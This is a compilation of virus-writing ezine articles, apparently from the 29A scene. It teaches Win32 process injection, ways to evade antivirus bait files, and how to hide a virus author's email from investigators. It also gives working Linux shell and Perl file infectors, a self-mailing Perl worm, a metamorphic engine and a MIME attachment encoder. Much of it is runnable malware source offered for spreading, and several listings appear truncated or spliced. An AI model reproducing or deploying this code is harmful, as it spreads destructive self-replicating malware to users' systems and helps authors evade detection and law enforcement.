file APIz and so stay resident. 100% Win32 compatible residency could be done
by registry tricks or by hooking importz in Import Table of PEz (so called
per-process residency).
imagine this: you have opened cmd.exe application (command interpret) and
accidentelly you'll execute such virus. from that time, all file operationz,
even in cmd.exe process are hooked and every executable file opened by the
application(z) will be infected. nice, eh?
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ Explanation ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
1*,7* I know two wayz how to create handle to any already running process.
for detailed description how to work with these APIz look at GriYo's
"EXPLORER *in-memory* infection" article published in 29A#4.
II) second method is used by Win32.HIV. becoz every process has its own
ID number, valid in whole system, there's no problem to just randomly
select one small number (<4000), check if it's valid PID and if it is,
create the handle to it.
push PAGE_EXECUTE_READWRITE
push MEM_RESERVE or MEM_COMMIT
push virus_size
push 0 ;allocate enough space
push ebx ;for virus code in
call [ebp + a_VirtualAllocEx - gdelta] ;victim process
test eax,eax
je end_K32_dealloc ;quit if error
mov [ebp + virus_base - gdelta],eax ;save the address
4* first what you have to do is to get the size of kernel32.dll. the code
from Win32.HIV follows:
;Now we have to get the size of K32 in another process. We use the trick
;-> we will search thru the address space for the end of K32 in memory
;and then we will substract the value with the base address, so we will
;get the size
start_parse:
push mbi_size
lea eax,[ebp + mbi - gdelta] ;MBI structure
push eax
push esi
push ebx ;get informations about
call [ebp + a_VirtualQueryEx - gdelta]
test eax,eax ;adress space
je end_K32_patching ;quit if error
;is memory commited?
test dword ptr [ebp + reg_state - gdelta],MEM_COMMIT
je end_parse ;quit if not, end of K32 found
mov eax,[ebp + reg_size - gdelta] ;get size of region
add [ebp + k32_size - gdelta],eax ;add the size to variable
add esi,eax ;make new address
jmp start_parse ;and parse again
end_parse:
sub esi,[ebp + k32_base - gdelta] ;correct to size and save it
mov [ebp + k32_size - gdelta],esi ;(size=k32_end - k32_start)
push PAGE_READWRITE
push MEM_RESERVE or MEM_COMMIT
push esi
push 0
call [ebp + a_VirtualAlloc - gdelta] ;allocate enough space
test eax,eax ;for K32 in our process
je end_K32_patching
xchg eax,edi
mov [ebp + k32_copy - gdelta],edi ;save the address
ÚÄÄÄÄÄÄÄÄÄ¿
³ Closin' ³
ÀÄÄÄÄÄÄÄÄÄÙ
woow! and the multi-process resident virus is finished. this method is not very
difficult to realise, it is small and very efficent. and it worx. if you would
like to get more informationz about this, or you will want anything else,
contact me!
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
# Benny / 29A ÀÄÄÄÄÄÄÄÄÄÄÄ¿
@ benny_29a@privacyx.com ³
@ http://benny29a.cjb.net ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
VIRII FEEDBACK
by TangentVirii.
INTRO.
I think one of the problems for virus coders is that we usually haven't
got feedback with our programs. For instance, if we spread a virus, we
can't know if it's working well or not. The unique way to know if all has
worked fine is reading the AVers texts: if they say something as 'The 5626
Virus is one of the most powerful viruses in the world. It has infected
more than 60000 PCs over the world', we know that all is fine. However,
these texts aren't very trustable. They have lots of lies, and other
bullshits.
The question is: how can my virus say me if he's spreading a lot, or not?
MAILING.
In this article we aren't gonna explain how to send a single mail with
Win32... we 're gonna explain a more original thing. How to do it in a
secure way!
If you want to learn how to send a mail with the Win32 API, search it in
Internet, there's a lot of info about Winsock. You can send mails with
MAPI... or you can do it with SMTP, that is more efficient. U CHOOSE.
FEEDBACK.
; mail me a text
push offset emailtext
push offset emailaddress
call sendEmailToMe
It's fine, but what about if you don't want to show your email address?
You can crypt the emailaddress too, but a sniffer can capture the email
address anyway. How the hell can you hide your address but allowing your
virii to mail you?
DO I NEED IT?
You r not gonna need nothing of this if you uses a secure mail server,
because of this way you haven't to worry about cops going to you. If you
give your mail to ppl in virus ezines, as 29a members do, and you sign
your virus with your handle, it's useless to try to hide your mail
because cops know it.
This info is only useful if you need to hide your mail address but you
want virus emailing you. Else, you can read it anyway, because it can be
useful for you in the future.
And if you think is very dangerous to put your email address in a virii,
this article is for you.
EUREKA.
switch(rand()%4){
case 0:
sendMailToMe(text,"stupidmailer@yahoo.com");
break;
case 1:
sendMailToMe(text,"idioticmailer@hotmail.com");
break;
case 2:
sendMailToMe(text,"joe@otherserver.com");
break;
case 3:
sendMailToMe(text,"billgates@microsoft.com");
break;
}
What do you think can happen with this code? If somebody tries to trap you
he have to investigate four persons, including Bill Gates!!! Can you
imagine Bill going in jail because of you? :)
One problem with this code is that you'll only receive one of four mails
but... do you need all of them? Think your virus can infect thousands
of computers, it can be a lot!!! And if you make a virus send as much
random mails as posible, you can ever receive lots of mails.
But four mails aren't enough. You have to add more addresses so AVers and
cops can't figure which is the yours. What about combining them? For
example:
switch(rand()%4){
case 0:
person="joe";
break;
case 1:
person="john";
break;
case 2:
person="billgates";
break;
case 3:
person="virusauthor";
break;
}
switch(rand()%4){
case 0:
wsprintf(emailaddress,"%s@yahoo.com",person);
break;
case 1:
wsprintf(emailaddress,"%s@hotmail.com",person);
break;
case 2:
wsprintf(emailaddress,"%s@29a.org",person);
break;
case 3:
wsprintf(emailaddress,"%s@microsoft.com",person);
break;
}
sendMailToMe(text,emailaddress);
Oh!, now you have 4*4= 16 different mails!!! Do you catch the idea? Using
the same system you can create tons of mail addresses on the fly. If you
can do it real, so almost all the email addresses exist, you can spoof
cops a lot!!! However, 16 isn't enough... you have to create more and more
email addresses. A system can be:
char user[5]={0,0,0,0,0};
char buffer[]="johnearbilljaneeditotpartgoalredh"
memcpy(user,buffer+(rand()%30),4);
switch(rand()%4){
case 0:
wsprintf(emailaddress,"%s@yahoo.com",user);
break;
case 1:
wsprintf(emailaddress,"%s@hotmail.com",user);
break;
case 2:
wsprintf(emailaddress,"%s@29a.org",user);
break;
case 3:
wsprintf(emailaddress,"%s@microsoft.com",user);
break;
}
john@29a.org
need@microsoft.com
bill@yahoo.com
llja@hotmail.com
goal@yahoo.com
And, of course, only increasing the buffer array size, you can increment
the email addresses.
Better, if you change all rand by a time routine, what do you think can
happen? You can calculate all so some day all mails are redirected to you,
else they go elsewhere, and AVers couldn't figure what's your real mail!!!
OTHER USES.
BYE.
Any questions, email me. Also, if you have interesting ideas about ALIFE
and viruses, mail me, I want to hear them.
TangentVirii.
tangentvirii@privacyx.com
Win32 Bait Detection
by SnakeByte [ SnakeByte@kryptocrew.de ]
1.) Size
2.) Imported API's
3.) Used DLL's
4.) Data Size
5.) Code Size
6.) Ressources
7.) Repeating Stuff
8.) Misc
1.) Size
Of course, this is the most simple thing we can check for. In win32
environment, the size of a file should be at least 30 or 40 KB.
I got on my harddrive just 2 dozen of files which are smaller than 40 KB,
and these are mainly my own asm projects or those "hax0r" tools delivered
with various mIRC Scripts. If they generate just 10000 goats, with more
than 40 KB, they need 390 MB, not much when you take a look at nowaday
harddrives, but it will cost them some time to generate them ;)
Ok, a file uses at least the imports of one DLL : Kernel32.dll *g*
But when you take a look at some others, you see, that they use 5 or more DLL's.
Except for those Visual Basic generated Files, they often just use the
VB40032.dll or one of those other runtimes, if the author is bad and does
not also use the Kernel32.dll API's. So check if there are less than 5 DLL's used, if
one of those starts with VB, then it is normally no goat, but a badly coded VB
Programm.
Check for the size of initialized Data in the Optional Header. The Rose Bait has
here just 1500 Bytes, a typical program, wheter VB or not, around 12000 Bytes !
So we can take this as another identifier for baits. Look for this value at offset
20h of the PE Header, which could be easily done ;)
We should also check the "Size of Code Section" in the optional Header,
a bait just has a low value here ( sure, it has not much code ;) ) but a
normal file has 5000 and more. This value can be found at offset 2Ch of
the PE Header, so it is easy to check too.
6.) Ressources
Every normal file uses Ressources, like Pictures, Icons and such things.
If we find none, we should not infect the file, because just a gout file
has no icon ;) To check this we need to locate the .rdata Sektion and check
for it's size inside the section table. I think 800h Bytes is a minimum for
a normal file ( thats about 1 Icon )
When a goat file generator generates baits, they often have exactly the same
size, so check if the current file has the same size as the last one, if this
is the cause, then don't infect it. Filenames might also follow a pattern, when
generated with a generator. This is the same as in DOS, they either have names
like Goat0001.exe, Goat0002.exe.. or 0001Goat.exe, 0002Goat.exe..
I would say the best method to avoid such files is to check the first and
the last digit of the filename ( without extension ). If they are equal or
just differ in one Bit, then they should not be infected.
But some goat generators are able to generate baits with different sizes and
random filenames, what to do against them ? One thing which will repeat, are
the first bytes of the code, because they just change the size and data. But checking
for this would be really hard, because a lot of high level compilers have several
routines, which get started before the programmers stuff get executed. If you store
the first 100 Bytes in Memory, you would also detect HLL Programs as baits. So
my solution is to read 2000-3000 Bytes of the code section and generate a checksum
over this part, then you don't need to store a lot of data ( But make sure the CRC
is a fast one *g* )
8.) Misc
Some might say, all these anti goat tricks are useless, because the AV'er will
just NOP them out or write his own replication routine for the virus, which
will not have these tricks, but the same poly engine. Sure, this would be
bad for us, but what if we generate a checksum over the entire virus code and
use it as a main basis number for the random number generator ? Then the AV'er has
to fear, that his routine ( or the virus with nopped out tricks ) will generate other
variants like your virus and his scanengine might miss some of your viruses.
So just choose some of these tricks, they don't need that many bytes and i think
they will be an effort for your virus.
Linux Shell Script Viren
by SnakeByte [ SnakeByte@kryptocrew.de ]
www.kryptocrew.de/snakebyte
Nowadays as Linux becomes more and more popular, every linux user starts telling me that
there are no viruses
for his loved os. After a long discussion most of them believe me, that it is possible to
write a virus
for Linux, but its harder for them to spread, because Linux takes more care of acess rights
than Dos
or Windows ( there are none *g* ) Ok, there are ELF Infectors out, which carry exploits to
gain root, but
here I want to talk about more simple viruses, which could also be able to spread, once
there are more
lamers using Linux ( and at the moment their number grows ) My opinion is, that Viruses
will also be a problem
for Linux in the future, because there is more and more commercialism and with commercial
products come a lot
of unexperienced users which do not know how to keep their system clean. Another reason why
I deal with
Shell Script Viruses here is, that the bash shell script is running on most systems and so
we don't have to
fear incompatibility. ( I don't know how far the scripts presented here are compatible to C
or another
shell, if anyone tests this, please let me know ;) ) Shell Scripts are like batch files in
the good old
days of dos, or like VBScript in Windows. They allow the programmer to make routine jobs
more easier and
faster. The Scripts get interpreted by the shell and are very powerful. Contrary to DOS,
you will find
a lot of shell scripts when taking a look at Linux. Shell Scripts are for example :
/etc/profile,
/etc/csh.cshcshrc. some files in /etc/rc.d, files to configure the firewall and many more.
For all Linux Newbies : 'vi' is an editor you could use to write these simple scripts ( and
don't believe anyone
who tells you, that emacs or joe are better *g* ). Use 'chmod
<file> +rwxrwxrwx' to
make everyone able to read, write and execute the file. To start
the script, you simply
have to type the filename. ( On some systems you need to place a ./
in front of the filename
because the current directory is not inside the path value )
We saw that a shell script virus has a whole potential of possible victims. Let's take a
look at the most
simple form of a shell script virus :
#Overwritter I
for file in *
do
cp $0 $file
done
This, just a few lines long script, copies itself over every file in the current directory.
Of course, this methos
of infecting comes with a lot of damage and should be found very fast, so we need to make
everything a bit more
tricky.
#Overwritter II
for file in *
do
if test -f $file
then
if test -x $file
then
if test -w $file
then
if grep -s echo $file >.mmm
then
cp $0 $file
fi; fi; fi; fi; fi
done
rm .mmm -f
Here we included some additional checks for the file we want to infect. First, we check if
it is a file at all.
Then if it is executable and if we got write access. If the file passed all checks, we
search the file for
the echo command, which is part of most Shell Scripts ( displays something on the screen )
( Because we did not get all scripts this way, we could also do a :
if file $file | grep -s 'Bourne shell script' > /dev/nul ; then )
Because a shell script does not longer work, after being overwritten, we should think of
another infection
method. The following code is a prepender i wrote nearly 2 years ago to see if it can be
done :
# COCO
head -n 24 $0 > .test
for file in *
do
if test -f $file
then
if test -x $file
then
if test -w $file
then
if grep -s echo $file >.mmm
then
head -n 1 $file >.mm
if grep -s COCO .mm >.mmm
then
rm .mm -f
else
cat $file > .SAVEE
cat .test > $file
cat .SAVEE >> $file
fi; fi; fi; fi; fi
done
rm .test .SAVEE .mmm .mm -f
The # COCO is our infection mark, to see if a file is already infected. ( we check this with
if grep -s COCO .mm > .mmm ) After this we have the old checks if the file is a good victim.
If the file is ok and not infected yet, we copy it into another, hidden file ( .SAVEE ).
Now we replace
the original file with the first 24 Lines of our shell script file, which is exactly the
virus.
( we save them in .test bevore ) Now we just append the original file to the virus. ( cat
.SAVEE >> $file )
Last but not least, we delete every file we created during the infection.
Now we can start optimizing. This can be done with two goals : One is to reduce the number
of lines,
the other on is to reduce the number of temporary files we use. The next code is ( or is
nearly, because i
lost the original ) the optimized version of COCO, which Antraxx optimized for me some time
ago.
# COCO ( 2 ? )
for file in * ; do
if test -f $file && test -x $file && test -w $file ; then
if grep -s echo $file > /dev/nul ; then
head -n 1 $file >.mm
if grep -s COCO .mm > /dev/nul ; then
rm .mm -f ; else
cat $file > .SAVEE
head -n 13 $0 > $file
cat .SAVEE >> $file
fi; fi; fi
done
rm .SAVEE .mm -f
Now we just need 2 temporary files and 13 lines of code. Of course could be stick all lines
together into
one by seperating them with a ; , but this would be unreadable so I will not do this here.
What else does a virus need to be effective ? He should not just infect the current
directory, but
should parse others for victims. ( /etc, /bin, /sbin.. )
In this example we save the current directory first, which is stored in the variable $path.
Then we
search the root directory for other directories. If we found one, we change into it and
search for
shell script files. We infect them with the old method and change to root directory
afterwards.
At the end we return to the original directory and remove the files we created.
# COCO 3
xtemp=$pwd
head -n 22 $0 > /.test
for dir in /* ; do
if test -d $dir ; then
cd $dir
for file in * ; do
if test -f $file && test -x $file && test -w $file ; then
if grep -s echo $file > /dev/nul ; then
head -n 1 $file > .mm
if grep -s COCO .mm > /dev/nul ; then
rm .mm -f ; else
cat $file > /.SAVEE
cat /.test > $file
cat /.SAVEE >> $file
fi; fi; fi
done
cd ..
fi
done
cd $xtemp
rm /.test /.SAVEE .mm -f
Not bad for something simple like a shell script, or ? Of course could we also search for
specific directorys
and add a payload ( Message, expand passwd, ping-flood a host, download a backdoor with
ftp, etc.. ), but in
this tutorial i will not cover such things. I think it is also possible to use sendmail or
any other
mail program to send the script around via mail, but as long most people use windows, this
would not be
very effective.
To make this file complete, here is a ELF Compagnion Virus :
# Compagnion
for file in * ; do
if test -f $file && test -x $file && test -w $file ; then
if file $file | grep -s 'ELF' > /dev/nul ; then
mv $file .$file
head -n 9 $0 > $file
fi; fi
done
.$0
Perl Viruses
by SnakeByte [ SnakeByte@kryptocrew.de ]
www.kryptocrew.de/snakebyte
Due to the fact, that I have to learn perl for a job, I decided to write a virus in
this language. Until this morning I haven't found a perl virus source on the web,
so I decided to write a little paper about perl viruses. This tutorial has the
same structure like my tutorial about Linux Shell Script Viruses and so I am sure,
that also perl newbies ( like me ;) ) will understand it. At the moment I did not have
a look at the perl virus I found, because I want to try to produce my own.
( Just finished a totally lame overwritter, but decided to start typing this,
because I want the reader to follow my steps ).
All code you will see here is tested on a SuSe 7.0 Linux with Perl 5.0005_3 and
worked well. I try to make it compatible to other OS'es but can't guarantee this.
Ok, let's start with the Overwritter I talked about. First the source
and then I will explain what it does.
#!/usr/bin/perl
open(File,$0);
@Virus=<File>;
close(File);
The first line is a comment ( marked with an # ). It is a nearly standart, that every
perl file contains the path and file of the perl interpreter in the first line.
On the second line, we open ourselves. The filename of the running script is stored
in $0. Then in the third line, we pass the content of our file into the array
@Virus. Now, every Value of the Array ( @Virus[1], @Virus[2] ... ) contains one
line of our file. Because this is all we want to do with our own file, we close it.
Then we start a loop to search for files. We pass this loop for all files in the
current directory (<*>) and pass their name to $FileName. We open the file
for write access ( shown by the > bevore the filename ) and simply print our virus
over the old file. ( if we would want to append instead of overwriting the file, we
would use a >>filename instead ). Ok, the file is replaced by the virus, so lets get
the next one and do the same...
I think this little code snippet should be very clear now ;)
Lets make it a bit better, so we will not overwrite every file, but just perl files.
#!/usr/bin/perl
open(File,$0);
@Virus=<File>;
close(File);
The first few lines are known from the previous example. Then follows a huge :)
if-construction. Let's see what it does. It filters out all files, which
we are able to read ( -r ) to write to ( -w ) and which are files at all and no directorys
( -f ).
Each one of these criterias must be fulfilled, because we appended them together with an
&& which is a logical AND. Then we open the file for read access. ( You see, no > bevore
the filename ).
We load the entire file to $Temp and close it. Then we check the first ( @Temp[0] ) and the
second line ( @Temp[1] ) for the word "perl" ( cases are not ignored, but till now I found
no case
ignoring comparison method for strings, but I go on looking *g* ), to check
if we got a perl file. The rest is like in the example before. Here two things we could
additionally
do to check the files. The one is to see if they are executable ( if (-x $FileName ) ), but
since I
think that we cannot check this in windows environment, and that there are people like me,
which start their perl files with the interpreter and not setting the executable flag on the
files, I won't do it. The other check we could do is with the linux command 'file' to see if
a file is a perl script. But this wouldn't work in windows too, so i will not do this here.
Ok, i think this made the basics understandable. Now, forget this shitty overwriting stuff
and
start doing something more serious - prepending :
#!/usr/bin/perl
#PerlDemo # NEW
open(File,$0);
@Virus=<File>;
@Virus=@Virus[0...27]; # NEW
close(File);
This time I marked the new lines, because not much changed. The first change is that we get
just the
24 first lines of the currently running ( infected ) file. This is because, we would also
prepend the
original file to the one we infect. The second change is that we add the original file to
the virus,
when infecting. So the new file will start with the virus, then an empty line and then the
old file,
starting with the #!/usr/bin/perl or whatever ;)
The new check for "PerlDemo" is to see if the file has already been infected by us.
Normally I would start to see what can be optimized, but here we can't do much, except
trashing the lines together as far as I see :
#!/usr/bin/perl #PerlDemo
open(File,$0); @Virus=<File>; @Virus=@Virus[0...6]; close(File);
foreach $FileName (<*>) { if ((-r $FileName) && (-w $FileName) && (-f $FileName)) {
open(File, "$FileName"); @Temp=<File>; close(File); if ((@Temp[1] =~ "PerlDemo") or
(@Temp[2] =~ "PerlDemo"))
{ if ((@Temp[0] =~ "perl") or (@Temp[1] =~ "perl")) { open(File, ">$FileName"); print File
@Virus;
print File @Temp; close (File); } } } }
So this saves us just some carriage returns and is not really cool :P
Let's add some more cool features to our virus like directory travelling.
We will first take a look at downward traveling :
#!/usr/bin/perl
#Perl Virus - Downward Travelling
open(File,$0);
@Virus=<File>;
@Virus=@Virus[0...24];
close(File);
&InfectFile; # NEW
chdir('..'); # NEW
&InfectFile; # NEW
What have we done ? The first change that you will mention is, that we placed the
file-search and
infection routine into a sub procedure, which we call two times from the main program.
Another change is the chdir('..') which will let us get one directory down. This sould work
fine
on Unix/Linux and DOS/Windows Systems, but will cause Errors on MacOS, because MacOS uses
'::' to get
one directory down. Sad bud true, perl is not as portable as we want it to :P
Another change is inside the check for the file. (@Temp[1] =~ "perl",,i) The ,,i meand that
we search
for the string perl and ignore the upper and lowercases, so we will also find perl files
starting with #C:\Programme\Perl\Perl.exe. A, let's call it bug in this virus is, that we
don't
restore the old directory. This is another problem caused by the incompatibility of the
different OS. In Unix/Linux, we can simply get the current path by doing a $CurPath=`pwd`;
But this would not work on Win or MacOS. Luckily we can get the OS under which we are
running,
with the $^O Variable, which exists since Perl 5.0002. The following code will see if we
are in Dos, Windows,
Linux, BSD or a Solaris machine.
#!/usr/bin/perl
#Perl Virus - Downward Travelling
open(File,$0);
@Virus=<File>;
@Virus=@Virus[0...30];
close(File);
&InfectFile;
if (($^O =~ "bsd") or ($^O =~ "linux") or ($^O =~ "solaris")) { $OldDir = `pwd` } # NEW
if (($^O =~ "dos") or ($^O =~ "MSWin32")) { $OldDir = `cd` } # NEW
$DotDot = '..'; # NEW
if ($^O =~ "MacOS") { $DotDot = "::" } # NEW
chdir($DotDot); # NEW
&InfectFile;
chdir($OldDir); # NEW
sub InfectFile {
foreach $FileName (<*>) {
if ((-r $FileName) && (-w $FileName) && (-f $FileName)) {
open(File, "$FileName");
@Temp=<File>;
close(File);
if ((@Temp[1] =~ "Virus") or (@Temp[2] =~ "Virus")) {
if ((@Temp[0] =~ "perl") or (@Temp[1] =~ "perl")) {
open(File, ">$FileName");
print File @Virus;
print File @Temp;
close (File);
}}}}}
Ok, if the OS is bsd, linux or solaris, we retrieve the current path with the pwd command,
which
is a normal shell command to retrieve the current path. In windows we just do this with cd,
which
is normally used to change directorys but can be used to get the path as well. Then we set
the two
dots to '..' like they are used in nearly every OS, except MacOS, so we change them to '::'
if we
are running on a Mac. Maybe it would be a better solution to make two checks, one for
MacOS, and
set the Dots, one for Dos, Windows and OS/2 to use cd to retrieve the path and for
everything left,
we use the two dots and pwd to retrieve the path, because there are many more Unix and BSD
Versions,
to which perl is ported and they all have the pwd command.
If we would want to travel upwards, we have the same problem, that the different operating
systems
have different ways to tell us their root directory. Linux has just one /, Windows and Dos
have one
for every Disk A:, B:, C: ... and as far as I know has the Mac none at all.. With the next
source
I will try to handle all these problems :
#!/usr/bin/perl
# Perl - Get'em'all Virus
open(File,$0);
@Virus=<File>;
@Virus=@Virus[0...46];
close(File);
&InfectFile;
if ($^0 =~ "MacOS") {
chdir('::');
&InfectFile; }
else { if (($^O =~ "dos") or ($^O =~ "MSWin32")) {
$OldDir = `cd`;
chdir('..');
&InfectFile;
chdir('C:\');
&SearchUpperDirectorys;
chdir($OldDir);}
else {
$OldDir = `pwd`;
chdir("/");
&SearchUpperDirectorys;
chdir($OldDir);}}
sub InfectFile {
foreach $FileName (<*>) {
if ((-r $FileName) && (-w $FileName) && (-f $FileName)) {
open(File, "$FileName");
@Temp=<File>;
close(File);
if ((@Temp[1] =~ "Virus") or (@Temp[2] =~ "Virus")) {
if ((@Temp[0] =~ "perl") or (@Temp[1] =~ "perl")) {
open(File, ">$FileName");
print File @Virus;
print File @Temp;
close (File);
}}}}}
sub SearchUpperDirectorys {
foreach $Directory (<*>) {
if ((-r $Directory) && (-w &Directory ) && (-d $Directory) {
chdir ($Directory);
&InfectFile;
chdir ('..')
}}}
Ok, if we are in MacOS, we just infect the lower directory. If we are in DOS or Windows
environment,
we infect the folder below and start to search for others at C:\. Afterwards we restore the
old
directory. On every other OS, we search from the root directory for others. Afterwards we
restore the
original one. Wow, first of all I wanted to start parsing the Path variables which contains
all
directorys which will be searched when you want to start an executable, but with all these
incompatility
problems... maybe later. Now I want to have a look at the virus I talked about before,
which I found
on the web. AVP detects this thing as Perl.spoon and it is created by PaddingX. I just hope
it is ok for
him, if I present his source here, but I don't know where to reach him to ask him. So if
you read this
and want me to remove this part, just tell me ! I added some comments so you will
understand the code.
These comments are marked with an 'S'
#!/usr/bin/perl
use File::Find; #S he uses a module to find files, it's included all standart
perl installations
&virus(); #S calling of the sub Virus
#S after Virus Sub is executed we see a little payload ( just
in dropper ! )
print "\nThis program is infected by the Perl virus\n\n";
Ok, as we see, this virus is an appender. It writes a call to the virus at the start and
appends
the rest to the file. This is like the old com infection appending in dos. ;)
The infected file will look like this :
[ Stub :
#!/usr/bin/perl
use File::Find;
&virus(); ]
[... Original File ... ]
[ .. virus procedure ..]
Even if it will just run on Unix'es ( because of the path and because fork
is not implemented on Mac OS, Win32, AmigaOS and RISC OS ) it is still a nice
piece of code, because I think it would be possible to use EPO techniques with
this kind of infection, by searching for a call (&Procedure) and change it to the
virus and place a call to the original procedure at the end of the virus...
Ok, here comes a last piece of code, just to show another simple thing you
can do with perl, because everyone says that Selfmailing Worms are something
which can just be done with windows script languages. This is a selfmailing
Perl worm, which uses sendmail and assumes, that the mails are in the
/var/spool/mail/ directory. Maybe one of those, who know more about linux than I do,
might want to modify it, to retrieve the mail folder from sendmail.cf ;)
#!/usr/bin/perl
open(File,$0);
@Virus=<File>;
@Virus=@Virus[0...29];
close(File);
chomp(@Addy[1]);
chop(@Addy[1]);
$x = `sendmail @Addy[1] < PerlWurm`;
}}}
Hope you enjoyed this little trip into the world of perl. I did. ;)
comment %
into different instructions and then call it, provided that eax must
not be preserved. Run it under a debugger and see how it works by
single stepping through the Call instr1 instructions.
If you understand the process, with very few modifications you can
use this to also metamorphize instructions like:
.586p
.model flat, stdcall
jumps
.data
db 0
.code
;
start: ;
xor ebp, ebp ; assume virus model ;-)
;
mov eax, 11111111h ;
call instr1 ;do original instruction
;
mov eax, 0 ;metamorphize instr 0
call LJ_Metamorphize ;
mov eax, 22222222h ;
call instr1 ;run it!
;
mov eax, 0 ;metamorphize again
call LJ_Metamorphize ;
mov eax, 33333333h ;
call instr1 ;run it!
;
mov eax, 0 ;metamorphize again
call LJ_Metamorphize ;
mov eax, 44444444h ;
call instr1 ;run it!
;
push 0 ;
call ExitProcess ;
db 10 dup (0)
; Here are the instruction sets that can be executed in order to do the
; action. These also should be spread into the code
var1_instr_1: ;variant 1
mov [ebp+var1_1], eax ;
nop ;
ret ;
;
var1_instr_2: ;variant 2
push eax ;
pop [ebp+var1_1] ;
nop ;
ret ;
;
var1_instr_3: ;variant 3
xchg [ebp+var1_1], eax ;
nop ;
ret ;
; These are the possible ways to keep the value. They should be spread inside
; the code as separated as possible
var1_1 dd 0 ; address 1
var1_2 dd 0 ; address 2
var1_3 dd 0 ; address 3
; - Metamorphizer
LJ_Metamorphize:
; Entry: EAX = hunk number (starting with 0!) ;
;
pusha ;
;
call ChooseAddress ;choose address to use
call ChooseInstruction ;choose instruction to use
call FillPlace ;fill the address
call FillJump ;fill the jump to it
;
popa ;
ret ;
;
choosen_address dd 0 ;holds the address
choosen_instruction dd 0 ;holds the instruction
choosen_bit dd 0 ;the bit to address
;
ChooseAddress: ;
push eax ;
lea esi, [ebp+AddressTable] ;point address tables
mov ecx, eax ;
or ecx, ecx ;
jz found_addresses ;
;
find_addresses: ;
lodsd ;
add esi, eax ;
loop find_addresses ;
;
found_addresses: ;
lodsd ;how many?
call brandom32 ;get a random one
mov eax, [esi+eax*4] ;
mov [ebp+choosen_address], eax ;save address
pop eax ;
ret ;
;
ChooseInstruction: ;
push eax ;
lea esi, [ebp+InstructionTable] ;point instructions
mov ecx, eax ;
or ecx, ecx ;
jz found_instructions ;
;
find_instructions: ;
lodsd ;
add esi, eax ;
loop find_instructions ;
;
found_instructions: ;
lodsd ;how many?
call brandom32 ;get a random one
mov ebx, [esi+eax*2*4] ;
mov [ebp+choosen_instruction], ebx ;save it, and
mov ebx, [esi+eax*2*4+4] ;
mov [ebp+choosen_bit], ebx ;the bit
pop eax ;
ret ;
;
FillPlace: ;
push eax ;
mov eax, [ebp+choosen_address] ;take the address
mov ebx, [ebp+choosen_instruction] ;go to the instruction
add ebx, ebp ;
add ebx, [ebp+choosen_bit] ;to the right bit
mov [ebx], eax ;and fill the address
pop eax ;
ret ;
;
FillJump: ;
push eax ;
lea esi, [ebp+Jumps] ;locate the jump
add esi, eax ;
;
lodsd ;
mov ebx, [ebp+choosen_instruction] ;get the offset of the
sub ebx, eax ;instruction
add eax, ebp ;
sub ebx, 2 ;calculate jump length
mov [eax+1], ebx ;create jump!
;
pop eax ;
ret ;
;
;
AddressTable: ;
Ahunk1: ;
dd 3 ;length of hunk
dd offset var1_1 ;addresses
dd offset var1_2 ;
dd offset var1_3 ;
;
InstructionTable: ;
Ihunk1: ;
dd 3 ;length of hunk
dd offset var1_instr_1 ;first instruction
dd 2 ;at what bit offset?
dd offset var1_instr_2 ;
dd 3 ;
dd offset var1_instr_3 ;
dd 2 ;
;
Jumps: ;
Jhunk1: ;
dd offset instr1 ;jump address
;
;---------------------- ;
brandom32 proc ;this bounds eax
push edx ;between 0 and eax-1
push ecx ;on random basis
mov edx, 0 ;
push eax ;
call random32 ;
pop ecx ;
div ecx ;
xchg eax, edx ;
pop ecx ;
pop edx ;
ret ;
brandom32 endp ;
;
random32 proc ;this is a random nr
push edx ;generator. It's a
call GetTickCount ;modified version of
rcl eax, 2 ;some random gen I found
add eax, 12345678h ;someday and it had
random_seed = dword ptr $-4 ;some flaws I fixed...
adc eax, esp ;
xor eax, ecx ;
xor [ebp+random_seed], eax ;
add eax, [esp-8] ;
rcl eax, 1 ;
pop edx ;
ret ;
random32 endp ;
;
end start ;
end ;
; Win32 386+ Random-Number-In-Range Generator.
;
; Most Win32 random number generators I've come across so far were
; actually rather predictable, so here goes my attempt to code a
; truely random one. It's small, simple and reasonably fast.
;
.386
.MODEL FLAT
EXTRN GetTickCount:PROC
EXTRN ExitProcess:PROC
.DATA
Random_Seed DD 0
.CODE
START:
CALL GetTickCount ; Initialize random seed.
MOV Random_Seed, EAX ; This can be anything.
PUSH 0
CALL ExitProcess
PUSH 32
POP ECX
POP EDX
POP ECX
RETN
END START
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[MIME.ASM]ÄÄÄ
; MIME attachment encoder.
.386
.MODEL FLAT
.DATA
EXTRN ExitProcess:PROC
EXTRN CreateFileA:PROC
EXTRN CloseHandle:PROC
EXTRN ReadFile:PROC
EXTRN WriteFile:PROC
EXTRN GetFileSize:PROC
START:
XOR EBX, EBX
PUSH EBX
PUSH FILE_ATTRIBUTE_NORMAL
PUSH OPEN_EXISTING
PUSH EBX
PUSH EBX
PUSH GENERIC_READ
CALL @1
DB 'INPUT.BIN', 0 ; Binary you want to encode.
@1: CALL CreateFileA
PUSH EBX
PUSH FILE_ATTRIBUTE_NORMAL
PUSH CREATE_ALWAYS
PUSH EBX
PUSH EBX
PUSH GENERIC_WRITE
CALL @2
DB 'OUTPUT.EML', 0
@2: CALL CreateFileA
PUSH EBX
PUSH OFFSET IO_Bytes_Count
PUSH (@4-@3)
CALL @4
@3: DB 'MIME-Version: 1.0', 0Dh, 0Ah
DB 'Content-Type: multipart/mixed; boundary=ir', 0Dh, 0Ah
DB 0Dh, 0Ah
DB '--ir', 0Dh, 0Ah
DB 0Dh, 0Ah
DB 'this is plain text', 0Dh, 0Ah
DB '--ir', 0Dh, 0Ah
DB 'Content-Type: application; name=binary.exe', 0Dh, 0Ah
DB 'Content-Transfer-Encoding: base64', 0Dh, 0Ah
DB 0Dh, 0Ah
@4: PUSH [Output_Handle]
CALL WriteFile
PUSH EBX
PUSH [Input_Handle]
CALL GetFileSize
CDQ
MOV ECX, (76/4)*3
DIV ECX
DEC EDX
JS No_Round
INC EAX
PUSH 0
PUSH OFFSET IO_Bytes_Count
